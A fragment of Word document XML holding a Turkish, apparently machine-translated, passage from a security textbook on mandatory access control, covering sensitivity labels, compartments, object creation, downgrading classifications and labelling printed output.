        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bu kaynaklar belirli bir hassasiyet seviyesinde veya altındadır. Etiketler kullanılıyor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Elektronik olarak depolanan belgelerin hassasiyet seviyesini göstermek için.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ek olarak, erişim kontrol politikası kaynakların bölümlere ayrılmasına dayalı olabilir. Örneğin, erişim kontrollerinin tümü belirli bir projeyle veya belirli bir çaba alanıyla (örneğin, teknik Ar-Ge veya</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>askeri istihbarat). Erişim kontrollerinin uygulanması şunları içerebilir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tek bölmeler veya bunların kombinasyonları. Bu birimleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“bölme” terimi ve buna rağmen kategoriler denir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Kategori” genellikle birbirinin yerine kullanılır. Her iki terim de veri işleme kısıtlamaları için geçerli değildir. Bireyler, bir kaynağa erişim hakkına sahip olmak için bir kaynakla ilişkili tüm kategoriler için yetkilendirmeye ihtiyaç duyabilir (bu durumda olduğu gibi).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>© 2004, CRC Press LLC tarafından</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ABD hükümetinin sınıflandırma şeması) veya kategorilerin herhangi birine (diğer kuruluşların çalışma şeklini daha fazla temsil ettiği gibi).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nesne Oluşturma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yeni bir nesne oluşturulduğunda, ona ne tür erişime izin verildiğine şüphe olmamalıdır. Oluşturma işi veya oturumu belirtebilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>açıkça bilgi; ancak, birileri adına hareket ettiğinden</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yönetici olmayabilir, zorunlu olanlara aykırı olmamalıdır</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>politikaları. Bu nedenle, yeni oluşturulan nesne hassasiyeti üstlenmelidir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İçerdiği verilerin Veriler kaynaklardan toplanmışsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>farklı özellikler, zorunlu politikanın dışlayıcı niteliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yeni nesnenin, verilerinin elde ettiği en hassas nesnenin özelliklerini üstlenmesini gerektirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Veri Sınıflandırmalarını Düşürme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Veri sınıflandırmalarının düşürülmesi bir yönetici tarafından gerçekleştirilmelidir. Bir iş veya oturum, yönetici olmayan biri adına hareket edebileceği için, veri sınıflandırmalarını düşürmemelidir. sağlanması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yeni nesnelerin en hassas nesnenin özelliklerini aldığını</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>verilerinin türetildiği bu amaca hizmet eden bir güvencektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Diğer bir koruma, bir işin veya oturumun çıktısı ile ilgilidir - çıktı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>asla en hassas seviyenin altındaki bir nesneye yazılmamalıdır</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kullanılan iş veya oturum. Bu, ilgili veriler olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>işin veya oturumun hassasiyet seviyesinin çok altında bir duyarlılığa sahip olmak,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çünkü bireysel verileri izlemek her zaman mümkün değildir. Bu gibi görünebilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pratik olmayan sert bir önlem; ancak en iyi niyetli olanlar bile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kullanıcılar yetkileri ile hareket eden bir Truva atı tarafından kandırılabilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Savunma Bakanlığı’nın (DoD’lar) alanı dışında,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>okunan verilere, bu verileri daha düşük hassasiyette bir dosyada saklayarak sınıflandırmalarını düşürme ayrıcalığı verilir. Bu mümkün</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>büyük ölçüde, çünkü verilerin toplanması, aralarındaki verilerin ayrı maddelerine göre daha hassas olabilir. Medeni hukukun geçerli olduğu durumlarda, özellikle DoD düzenlemeleri tarafından onaylanan fiili yükseltme,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ciddi düşünce. Örneğin, mahkemeler sır hırsızlığını tedavi edebilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tuvalet onarımı bildirimleri gizli olarak etiketlenirse verileri hafifçe. Bununla birlikte,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hiç kimse, fiili olarak yükselmeye karşı güvence altına almadı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Etiketleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir işten veya oturumdan çıktı, manyetikten ziyade fiziksel olduğunda veya</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Elektronik, hassasiyeti açıklayan bir etiket taşımalıdır ki insanlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uygulanabilir politikalara uygun olarak kullanabilir. Etiketler olabilir rağmen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hacimli olmak ve bu nedenle fiziksel anlamda sinir bozucu olmak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etiket yanlış yerleştirilmişse ciddi sorunlar yaratabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Örneğin, etiketlere bakılmaksızın yazılmış bir program veri yerleştirebilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çıktı ortamındaki herhangi bir noktada - örneğin basılı bir sayfa. Bir etiket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>isteğe bağlı olarak o sayfaya sabit bir konuma yerleştirildiğinde değerli bir yer paylaşımı olabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etiketten daha fazla zarara neden olan verilerin önlenmesi beklenebilir. Etiketi, bir tane bile olsa boş boyutta boş bir yere yerleştirmek,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Amaca hizmet et çünkü kimse onu nerede arayacağını bilemeyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yanlış etiket sayfanın başka bir yerinde görünebilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çünkü her bir çıktı sayfasını etiketlemek bu kadar zor problemler doğurur,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tüm yazdırma dosyalarının etiketlenmesi özellikle önemlidir. Kolay olmasına rağmen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir dosyayı bir sayfa ile açıklayan ve izleyen bir sayfa, böylesi bir sayfanın sahteciliğine karşı korunma daha kapsamlı önlemler gerektirir. Örneğin, bir kişi bir sayfanın ortasında bir sayfa oluşturabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bu dosyayı sonlandırmak için görünen çıktı dosyasını. Bu kişi daha sonra mümkün olabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tamamen ayrı, yanıltıcı etiketli bir dosyanın görünümünü simüle etmek</w:t>
      </w:r>
    </w:p>
